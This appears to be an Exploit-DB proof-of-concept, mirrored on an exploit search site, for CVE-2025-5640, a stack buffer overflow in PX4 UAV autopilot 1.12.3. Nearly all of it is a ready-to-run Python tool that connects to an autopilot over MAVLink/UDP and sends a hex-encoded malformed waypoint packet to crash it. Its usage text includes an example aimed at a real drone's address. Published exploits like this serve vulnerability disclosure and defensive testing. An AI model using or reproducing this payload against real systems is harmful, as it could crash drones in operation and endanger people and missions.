Share
## https://sploitus.com/exploit?id=EDB-ID:52339
# Exploit Title: PX4 Military UAV Autopilot 1.12.3 - Denial of Service (DoS)
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-06-21
# Tested on: Ubuntu 20.04 LTS + PX4 SITL (jMAVSim)
# CVE: CVE-2025-5640
# Type: Denial of Service (DoS) via Buffer Overflow
# Platform: Cross-platform (Military UAVs / PX4 SITL / Linux-based autopilot ground station)
# Author Country: Jordan
# Description:
# A stack-based buffer overflow vulnerability in PX4 Military UAV Autopilot <=1.12.3 is triggered
# when handling a malformed MAVLink message of type TRAJECTORY_REPRESENTATION_WAYPOINTS.
# An attacker with access to the MAVLink communication channel can send a crafted packet
# to crash the autopilot, potentially disrupting military UAV operations. This exploit demonstrates
# a proof-of-concept that causes the PX4 autopilot to crash via UDP.
import argparse
import binascii
from pymavlink import mavutil
import sys
# Exploit payload (malformed MAVLink hex)
hex_payload = (
"fdef0000dcea6f4c01006de9d06a0548182a1fcc8b7cc542eb8945a54baa92ee908db9af0195bb5dce5f9ab613be912485d34e577c352"
"c5cdc06592484be1aecd64a07127bda31fc8f41f300a9e4a0eab80d8835f106924f0b89ece3e256dda30e3001f07df4e1633e6f827b78"
"12731dbc3daf1e81fc06cea4d9c8c1525fb955d3eddd7454b54bb740bcd87b00063bd9111d4fb4149658d4ccd92974c97c7158189a8d6"
)
def connect_to_px4(ip, port, timeout, verbose=False):
try:
if verbose:
print(f"[*] Connecting to PX4 at udp:{ip}:{port} ...")
master = mavutil.mavlink_connection(f"udp:{ip}:{port}")
master.wait_heartbeat(timeout=timeout)
if verbose:
print("[+] PX4 heartbeat received. Connection OK.")
return master
except Exception as e:
print(f"[!] Error connecting to PX4: {e}")
sys.exit(1)
def send_dos_packet(master, verbose=False):
try:
payload = binascii.unhexlify(hex_payload)
master.write(payload)
print("[+] Exploit packet sent. Monitor PX4 for crash.")
except Exception as e:
print(f"[!] Failed to send payload: {e}")
sys.exit(1)
def main():
usage = """
PX4 Exploit Tool - CVE-2025-5640
=================================
Exploit a buffer overflow vulnerability in PX4 autopilot via MAVLink.
USAGE:
python3 px4_exploit_tool.py [OPTIONS]
EXAMPLES:
# Run DoS attack on default PX4 SITL
python3 px4_exploit_tool.py --mode dos
# Test connectivity to a real drone
python3 px4_exploit_tool.py --mode check --ip 192.168.10.10 --port 14550
OPTIONS:
--ip Target IP address (default: 127.0.0.1)
--port Target UDP port (default: 14540)
--mode Mode of operation: dos (default), check
--timeout Timeout in seconds for heartbeat (default: 5)
--verbose Enable verbose output
"""
parser = argparse.ArgumentParser(
description="PX4 MAVLink DoS Exploit Tool (CVE-2025-5640) by @banyamer_security",
epilog=usage,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument("--ip", default="127.0.0.1", help="Target IP address (default: 127.0.0.1)")
parser.add_argument("--port", type=int, default=14540, help="Target UDP port (default: 14540)")
parser.add_argument("--timeout", type=int, default=5, help="Timeout in seconds for heartbeat (default: 5)")
parser.add_argument("--mode", choices=["dos", "check"], default="dos", help="Mode: dos (default) or check connection")
parser.add_argument("--verbose", action="store_true", help="Enable verbose output")
args = parser.parse_args()
master = connect_to_px4(args.ip, args.port, args.timeout, args.verbose)
if args.mode == "check":
print("[*] PX4 is alive. Connection test passed.")
elif args.mode == "dos":
send_dos_packet(master, args.verbose)
if __name__ == "__main__":
main()